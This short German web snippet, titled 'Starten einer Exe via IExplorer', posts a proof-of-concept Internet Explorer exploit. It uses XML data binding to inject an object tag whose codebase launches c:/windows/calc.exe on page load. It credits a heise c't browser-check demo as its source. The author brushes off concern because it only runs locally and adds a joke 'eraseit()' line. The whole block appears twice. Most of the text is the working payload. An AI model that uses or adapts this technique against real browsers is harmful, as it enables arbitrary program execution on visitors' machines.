<html>
<body>Starten einer Exe via IExplorer
<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec">
<security>
<exploit>
<![CDATA[
<object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" codebase=c:/windows/calc.exe></object>
]]>
</exploit>
</security>
</xml>
Quelle: http://www.heise.de/ct/browsercheck/e5demo10.shtml
(Ich weiß, wird ja nur lokal ausgeführt, deshalb !is(schlimm))
if (os-installed == true) {
eraseit();
}
<body>Starten einer Exe via IExplorer
<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec">
<security>
<exploit>
<![CDATA[
<object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" codebase=c:/windows/calc.exe></object>
]]>
</exploit>
</security>
</xml>
Quelle: http://www.heise.de/ct/browsercheck/e5demo10.shtml
(Ich weiß, wird ja nur lokal ausgeführt, deshalb !is(schlimm))
if (os-installed == true) {
eraseit();
}
Kommentar